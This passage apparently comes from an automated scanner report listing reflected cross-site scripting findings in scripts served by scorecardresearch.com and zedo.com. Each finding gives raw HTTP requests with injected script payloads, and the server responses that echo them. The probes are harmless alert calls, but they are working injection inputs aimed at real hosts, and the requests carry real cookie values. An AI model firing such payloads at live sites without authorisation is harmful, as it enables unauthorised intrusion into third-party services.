Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113b1b71<script>alert(1)</script>27ada6e0b14", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});

5.20. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 69029<script>alert(1)</script>f027bdb3f14 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=1369029<script>alert(1)</script>f027bdb3f14&c4=13473&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:17 GMT
Date: Sun, 04 Sep 2011 00:45:17 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"1369029<script>alert(1)</script>f027bdb3f14", c4:"13473", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});

5.21. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload e3c2c<script>alert(1)</script>48cdf954b23 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473e3c2c<script>alert(1)</script>48cdf954b23&c5=45394&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473e3c2c<script>alert(1)</script>48cdf954b23", c5:"45394", c6:"", c10:"239096", c15:"", c16:"", r:""});

5.22. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload cfb0a<script>alert(1)</script>731425dd61f was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394cfb0a<script>alert(1)</script>731425dd61f&c6=&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394cfb0a<script>alert(1)</script>731425dd61f", c6:"", c10:"239096", c15:"", c16:"", r:""});

5.23. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload d842d<script>alert(1)</script>1190baab365 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=d842d<script>alert(1)</script>1190baab365&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"d842d<script>alert(1)</script>1190baab365", c10:"239096", c15:"", c16:"", r:""});

5.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3654a'%3balert(1)//60894199582 was submitted in the $ parameter. This input was echoed as 3654a';alert(1)//60894199582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=3654a'%3balert(1)//60894199582&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3654a';alert(1)//60894199582,a877b';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=94:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 970
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='3654a';alert(1)//60894199582,a877b'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=3654a';alert(1)//60894199582,a877b';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

5.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90cbc"-alert(1)-"db48eb64b4f was submitted in the $ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=90cbc"-alert(1)-"db48eb64b4f&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=92:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzD
...[SNIP]...

5.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3d47'-alert(1)-'252696a21cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fm.js?d3d47'-alert(1)-'252696a21cc=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1017
Content-Type: application/x-javascript
Set-Cookie: FFad=17:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=207
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:08 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-504/c5/jsc/fm.js;qs=d3d47'-alert(1)-'252696a21cc=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

5.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1609e'%3balert(1)//f15cbe80920 was submitted in the q parameter. This input was echoed as 1609e';alert(1)//f15cbe80920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=1609e'%3balert(1)//f15cbe80920&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=84:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 1074
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='1609e';alert(1)//f15cbe80920,609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=1609e';alert(1)//f15cbe80920,609c0'-alert(1)-'ce33e99e75d,1726d%
...[SNIP]...

5.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2602'%3balert(1)//50efe9478c4 was submitted in the $ parameter. This input was echoed as b2602';alert(1)//50efe9478c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=b2602'%3balert(1)//50efe9478c4&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:b2602';alert(1)//50efe9478c4,54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=36:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='b2602';alert(1)//50efe9478c4,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b2602';alert(1)//50efe9478c4,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

...[SNIP]...

5.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b766"%3balert(1)//2264924547d was submitted in the $ parameter. This input was echoed as 9b766";alert(1)//2264924547d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=9b766"%3balert(1)//2264924547d&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:9b766";alert(1)//2264924547d,54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=34:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='9b766";alert(1)//2264924547d,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9b766";alert(1)//2264924547d,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zz
...[SNIP]...

5.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 764dd'-alert(1)-'b14c84fceac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fmr.js?764dd'-alert(1)-'b14c84fceac=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1018
Content-Type: application/x-javascript
Set-Cookie: FFad=12:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=207
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:08 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-504/c5/jsc/fmr.js;qs=764dd'-alert(1)-'b14c84fceac=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

5.31. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33515"%3balert(1)//6ad1a189d09 was submitted in the q parameter. This input was echoed as 33515";alert(1)//6ad1a189d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=33515"%3balert(1)//6ad1a189d09&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=26:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
